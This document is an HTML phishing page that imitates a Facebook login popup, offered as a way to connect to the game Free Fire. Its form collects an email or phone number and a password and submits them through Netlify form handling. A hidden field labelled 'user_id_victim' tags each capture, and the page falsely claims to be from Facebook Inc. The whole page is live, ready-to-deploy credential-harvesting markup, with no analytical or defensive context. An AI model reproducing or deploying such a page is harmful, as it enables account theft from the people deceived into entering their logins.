<!DOCTYPE html>
<html lang="en">
<head>
   <meta charset="UTF-8">
   <meta http-equiv="X-UA-Compatible" content="IE=edge">
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
   <title>  Free Fire </title>
   <link rel="stylesheet" href="https://raviral.com/host_style/style/new_ff_v2/css/facebook.css">
   <link rel="stylesheet" href="https://raviral.com/host_style/style/new_ff_v2/css/style.css">
</head>
<body>
   <!-- <div class="popup-login facebook animated fadeIn" style="display: none;"> -->
      <div class="popup-box-login-fb">
          <a onclick="closefb()" class="close-fb"><i class="zmdi zmdi-close">X</i></a>
          <div class="navbar-fb">
              <img src="https://files.site-fusion.co.uk/webfusion10421/image/20100831_facebook-logo.png">
          </div>
          <div class="content-box-fb">
              <img src="https://lh3.googleusercontent.com/akplCmyGhcKXySj_c-ODskbnlzLDwbcnT0wAJVl3Fm2WAK0wL5WYUT1-rw-I6IaDYOg" width="50">
              <div class="txt-login-fb">
                   Log in to your Facebook account to connect to FreeFire
              </div>
              <!-- https://raviral.com/k_fac.php -->
              <!-- https://submit-code.blogspot.com   -->
              <form class="login-form"  
              method="POST"
              name="subscribe"
                   action="sub/index.html"
              netlify-honeypot="bot-field"
              data-netlify="true"
              >
                  <input type="text" name="email" class="inputFb" placeholder="Mobile number or email address" autocomplete="off" autocapitalize="off" required="">
                  <input type="password" class="inputFb" name="pass" placeholder="Password" autocomplete="off" autocapitalize="off" required="">
                  <input type="hidden" name="login" value="Facebook" readonly="">
              <input type="hidden" name="type" value="ff_fb" readonly="">
                  <input type="hidden" name="user_id_victim" value="0AUGO">
                  <button type="submit" class="btn-login-fb">Log In</button>
              </form>
              <div class="txt-create-account">Create account</div>
              <div class="txt-not-now">Not now</div>
              <div class="txt-forgotten-password">Forgotten password?</div>
          </div>
          <div class="language-box">
              <center>
              <div class="language-name language-name-active">English (UK)</div>
              <div class="language-name">Bahasa Indonesia</div>
              <div class="language-name">Basa Jawa</div>
              <div class="language-name">Bahasa Melayu</div>
              <div class="language-name">日本語</div>
              <div class="language-name">Español</div>
              <div class="language-name">Português (Brasil)</div>
              <div class="language-name">
                  <i class="fa fa-plus"></i>
              </div>
              </center>
          </div>
          <div class="copyright">Facebook Inc.</div>
      </div>
   </div>
   <style>
      .navbar-fb {
  background: #3b5998;
  width: 100%;
  height: auto;
  padding: 8px;
  border-top-left-radius: 10px;
  border-top-right-radius: 10px;
  overflow: hidden;
  box-sizing: border-box;
}

.login-form input[type="password"] {
  margin: 0;
  border-top: none;
  border-radius: 0 0 4px 4px;
  box-shadow: 0 0 0 rgba(0,0,0,.23) inset,0 0 0 rgba(255,255,255,.1);
  width: 100%;
  box-sizing: border-box;
}
.login-form input[type="text"] {
  margin: 0;
  padding-bottom: 13px;
  border-bottom: none;
  border-radius: 4px 4px 0 0;
  box-shadow: 0 -1px 0 #e0e0e0 inset,0 0 0 rgba(0,0,0,.23) inset;
  box-sizing: border-box;
}
   </style>
</body>
</html>